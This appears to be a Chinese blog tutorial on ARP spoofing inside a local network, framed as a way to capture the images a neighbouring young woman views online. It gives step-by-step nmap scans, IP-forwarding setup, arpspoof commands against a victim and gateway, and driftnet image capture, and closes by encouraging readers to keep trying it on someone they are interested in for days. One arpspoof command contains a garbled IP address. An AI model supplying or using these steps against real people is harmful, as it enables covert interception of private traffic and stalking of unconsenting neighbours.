内网渗透之抓取隔壁小姐姐上网图片

arp欺骗,利用中间人攻击原理,
对内网的用户实施欺骗,从而到达目的。
中间人攻击原理:两边通信的要经过黑客才能把信息转发给对方,
从而导致信息泄露。
内网渗透之抓取隔壁小姐姐上网图片_第1张图片

实验工具:
kali linux
nmap
arpspoof
driftnet

操作步骤:
1,扫描主机
nmap -sP 192.168.1.1-255
nmap -sS 192.168.1.1-255

2,开启IP转发,
root@kali:~# echo “1” >> /proc/sys/net/ipv4/ip_forward
root@kali:~# cat /proc/sys/net/ipv4/ip_forward
1

内网渗透之抓取隔壁小姐姐上网图片_第2张图片

3,开始投毒,进行欺骗
arpspoof -i eth0 -t 192.168.1.132 192.168.1.254
arpspoof -i eth 0 -t 1921.68.1.254 192.168.1.132
随便一条命令就行了,就是它们转发给任意一方的包,的要经过kali才能转发
出去
-i 网卡名
-t IP地址和网关

内网渗透之抓取隔壁小姐姐上网图片_第3张图片

4,打开图片捕获工具driftnet来抓取,
driftnet -i eth0

内网渗透之抓取隔壁小姐姐上网图片_第4张图片

5,把图放到最大,可以抓取跟多图片,(手机电脑都行,手机抓取的不稳定),要对方用浏览器访问才可以抓取。我打开自己的win10做一下实验。
内网渗透之抓取隔壁小姐姐上网图片_第5张图片

6,抓取的时候,网络不好可能有影响,抓取的图片鼠标点一下,就自动保存在root目录下

内网渗透之抓取隔壁小姐姐上网图片_第6张图片

7,个人体验并不好,因为别人上网不一定打开浏览器,找图片,如果说你对一个很感兴趣,到时可以试试,反正你可以抓取很多天有可能的抓不到,

你可能感兴趣的:(安全,LInux,信息安全)